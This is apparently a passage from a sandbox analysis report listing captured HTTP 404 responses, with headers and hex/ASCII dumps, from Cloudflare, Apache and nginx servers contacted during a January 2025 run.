Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpSZC4z9YkVfFFEJMSflwRhudl0cwa%2Fxzk7gFsYEjVYZWKFQ9SbF7UZUOhUXyQ9QbGDASQMCwcZCYkAaDXKPJ84iEXBo243m%2FaU%2BTKe9UUMBOopzXtbZdiF6i9XvZC%2F9etaM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe2cef59a44dad8-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119530&min_rtt=119530&rtt_var=59765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IVAXGeBlSRGGef%2FxMpCUo1thRVYy275idAVnQ9xwfhNgQT1A2oXgCVO3rveoaZFaH76xVRjNFfqeEDTvE37yc%2BQH7nBJkmhu6otrb1GHlvdg2yUltKf249htZ0zC0w8o3Gi0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe2cf062a2313f9-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119522&min_rtt=119522&rtt_var=59761&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7905&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVt7Dmc72MVsQTE5awLFye06ZagVOdwGy3NtyxvmA3D3nlr6DT4HyivcpmajYJ%2FcLSFqDh%2Fg5mWwTRxEbcmbWjBG6ndDoJC%2Bff6604otIS2M%2BoIUb7swxdgvnCOv%2Fvrj%2ByO8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe2cf16cd8f2237-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119718&min_rtt=119718&rtt_var=59859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=470&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 07 Jan 2025 09:09:32 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 07 Jan 2025 09:09:35 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 07 Jan 2025 09:09:38 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 07 Jan 2025 09:09:41 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:47 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:49 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:52 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 09:09:55 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
